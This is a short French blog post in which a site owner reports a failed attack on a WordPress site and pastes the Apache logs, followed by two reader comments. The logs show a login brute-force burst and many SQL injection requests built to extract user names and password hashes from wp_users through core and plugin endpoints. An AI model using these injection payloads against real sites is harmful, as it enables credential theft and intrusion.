Une attaque avec libwhisker

Ce site a subi une attaque depuis un serveur letton.  Rien de sérieux mais c’est la seconde fois ce mois-ci.

Vous pouvez jeter un œil aux logs apache ci dessous.

94.247.3.38 - - [13/Jan/2009:14:09:56 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:57 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:59 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:59 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:00 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:00 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:01 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:01 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:02 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:02 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:04 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:04 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:05 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:05 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:07 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:07 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:08 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:08 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:09 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:09 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:11 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:13 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:15 +0100] "GET /index.php?feed=rss2&p=11/**/union/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a),2/**/from/**/wp_users/**/where/**/user_id=1/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:17 +0100] "GET /index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 HTTP/1.1" 200 14673 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:24 +0100] "GET /index.php?exact=1&sentence=1&s=%a3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 HTTP/1.1" 200 14673 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:25 +0100] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:25 +0100] "GET /index.php?cat=%2527%20UNION%20SELECT%20CONCAT(0x3a,user_login,0x3a,user_pass,0x3a)%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:26 +0100] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:27 +0100] "GET /wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(0x3a,user_login,0x3a,user_pass,0x3a)+FROM+wp_users-- HTTP/1.1" 404 16231 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:28 +0100] "GET /wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4+from+wp_users--&display=plain HTTP/1.1" 404 16247 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:29 +0100] "GET /wp-content/plugins/wp-download/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/from/**/wp_users/* HTTP/1.1" 404 16259 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:30 +0100] "GET /index.php?page_id=13&album=lala&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201 HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:31 +0100] "GET /forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users/* HTTP/1.1" 404 16185 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:32 +0100] "GET /sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users/* HTTP/1.1" 404 16173 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:33 +0100] "GET /sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x3a,user_login,0x3a,user_pass,0x3a),0,0,0,0,0/**/FROM/**/wp_users/* HTTP/1.1" 404 16197 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:34 +0100] "GET /wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users HTTP/1.1" 404 16263 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:35 +0100] "GET /wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x3a,user_login,0x3a,user_pass,0x3a),concat(0x3a,user_login,0x3a,user_pass,0x3a),4,5/**/FROM/**/wp_users HTTP/1.1" 404 16285 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:36 +0100] "GET /wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,concat(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null,null,null,null,null,null%20%20from%20wp_users HTTP/1.1" 404 16357 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:40 +0100] "GET /wp-content/plugins/wp-adserve/adclick.php?id=-1%20union%20select%20concat(0x3a,user_login,0x3a,user_pass,0x3a)%20from%20wp_users HTTP/1.1" 404 16211 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:41 +0100] "GET /wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4,5,6,7%20from%20wp_users-- HTTP/1.1" 404 16241 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:42 +0100] "GET /wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4,5,6%20from%20wp_users-- HTTP/1.1" 404 16251 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:43 +0100] "GET /index.php?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null,null,null+from+wp_tbv_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:44 +0100] "GET / HTTP/1.1" 200 16299 "-" "Mozilla (libwhisker/2.4)"

Ces requêtes ont été faites avec libwhisker. Elles ont été effectuées sur la page de login sans succès ou sur des plugins WordPress que je n’ai pas installé. Elles ont aussi tenté de faire des injections SQL dans la base de données sans plus de succès.

2 réflexions sur « Une attaque avec libwhisker »

  1. Hi Xavier,

    I don’t ban IP adresses on my server because I never know who is using it.

    I found this site which is talking about security.

    Regards,

    Laurent

  2. Hi
    I get trouble with 94.247.3.38 .
    I try many times to hack my web site with SQL injection.
    I think I didn’t manage to crack my password, but they try.
    Do you know how to ban this IP from my visitor?
    Do you know which plugin is weak or poor for security?

    thanks for you help
    please contact me by email.

    xavier

Les commentaires sont fermés.